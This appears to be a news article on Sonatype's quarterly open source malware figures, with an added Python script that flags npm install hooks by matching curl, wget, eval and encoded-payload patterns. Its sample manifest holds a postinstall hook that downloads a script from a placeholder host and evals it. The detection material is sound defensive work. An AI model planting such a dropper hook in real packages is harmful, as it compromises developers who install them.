What Is Open Source Malware, and Why Are the Numbers So High?

Open source malware, as we know it, is malicious code hidden within software packages shared publicly on platforms like npm, PyPI, and Hugging Face. These platforms host free tools developers use on the job, which makes them an easy target for criminals who want to slip harmful code into trusted systems.

Sonatype’s latest Open Source Malware Index, released earlier today, recorded 34,319 malicious open source packages in the third quarter of this year. In total, Sonatype has found 877,522 malicious packages in the last six years. The company said attackers are now patient and well organised, using AI to embed malware directly into the tools developers rely on.

This new generation of malware is designed to look ordinary while stealing data or keeping long-term access to systems. Instead of flooding networks with noisy attacks, criminals now focus on stealth. They use AI to make their malware blend in with trusted code. This makes it much harder for security teams to detect before the damage is done.

Why Are the Numbers So High?

Attackers have learned that open source ecosystems are an ideal place to hide. These platforms depend on community trust and open collaboration, which allows anyone to upload a package. Once a tainted file is published, it can spread quickly through thousands of projects.

In Q3, data exfiltration malware made up 37% of all the malicious open source packages detected, according to Sonatype. This type of malware focuses on stealing credentials, access tokens, and other private information. Developers often use open source libraries in company software, which gives attackers a backdoor into corporate systems.

Another reason for the increase is the evolution of multi-stage attacks. Nearly 38% of all threats in Q3 were “droppers”, lightweight files that secretly install extra payloads like backdoors or information stealers. Backdoor-laden packages alone grew 143% from the previous quarter. These multi-layer attacks make detection much harder because the first file seems harmless, but once installed, it fetches other malware in the background.
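The dropper pattern described above is what a defender can screen for before a dependency is ever installed. The following is an added example, not part of Sonatype's report or any project's code: it audits an npm package.json for lifecycle hooks (preinstall, install, postinstall, prepare, which npm runs automatically on install) whose commands fetch and execute remote content. The manifest, the package name and the indicator patterns are constructed here for illustration.

```python
"""Audit an npm manifest for install-time hooks that behave like droppers.

The package.json below is CONSTRUCTED for this example. The hook names are
real npm lifecycle scripts; the indicator list is an assumed starting set.
"""
import json
import re

# npm runs these during `npm install`; a dropper needs no action beyond
# the dependency being installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for "download something and run it" (assumed, illustrative).
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://", re.I),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\(|Function\(", re.I),
    "shell_pipe_exec": re.compile(r"\|\s*(sh|bash|node)\b", re.I),
    "encoded_payload": re.compile(r"base64|fromCharCode|\\x[0-9a-f]{2}", re.I),
}


def audit_manifest(manifest: dict) -> list[dict]:
    """Return one finding per lifecycle hook whose command matches an indicator."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


# Constructed sample: an ordinary-looking package whose postinstall hook
# downloads a second stage and evaluates it, the classic dropper shape.
SAMPLE_MANIFEST = json.loads("""{
  "name": "example-colour-utils",
  "version": "4.1.2",
  "scripts": {
    "test": "node test.js",
    "postinstall": "node -e \\"require('https').get('https://example.invalid/s.js', r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\\""
  }
}""")

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print(f"[{f['hook']}] {', '.join(f['indicators'])}: {f['command'][:60]}...")
```

A check like this belongs in CI or a pre-install gate; it flags only the noisy end of the dropper spectrum, so treat a hit as a reason to inspect the package, not as proof of compromise.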

Crypto mining tools, which were once popular among hackers, have fallen to just 4% of total malware this quarter, compared to 6% before. Criminals are moving away from simple, easy-to-detect code and investing more in long-term attacks that offer a steady stream of stolen data or financial access.

Who Is Being Targeted?

Data shows that financial organisations are under the most pressure. Sonatype’s research found that 47% of blocked open source malware attacks in Q3 targeted banks and other financial services. These criminals just want money, credentials and confidential information that can be sold or used for more attacks.

Attackers also target developers directly. By infecting the tools they use, criminals can reach a much larger group of victims at once. The npm hijack of the popular “chalk” and “debug” packages, which together had more than two billion weekly downloads, proved how much damage can be done when trusted software turns hostile.

Another campaign, named Shai-Hulud, spread automatically across repositories, stealing credentials and publishing new compromised packages without human help. This self-replicating behaviour is only the beginning of a new level of sophistication in malware design, where a single infection can multiply across thousands of projects in a short time.

What Happened Earlier This Year?

You’ll remember that in April, Sonatype reported 17,954 malicious packages in the first quarter of 2025, which was already a record at the time. Over half of those targeted confidential data, up from 26% in late 2024. Banks and state offices were frequent victims, as criminals searched for tokens, system logs and login details that could open entire networks.

That has since only gotten worse: the latest report shows more refined malware aimed at stealing information rather than causing simple disruption. What began as an increase in cryptominers and data stealers has now developed into highly organised attacks targeting trusted dependencies…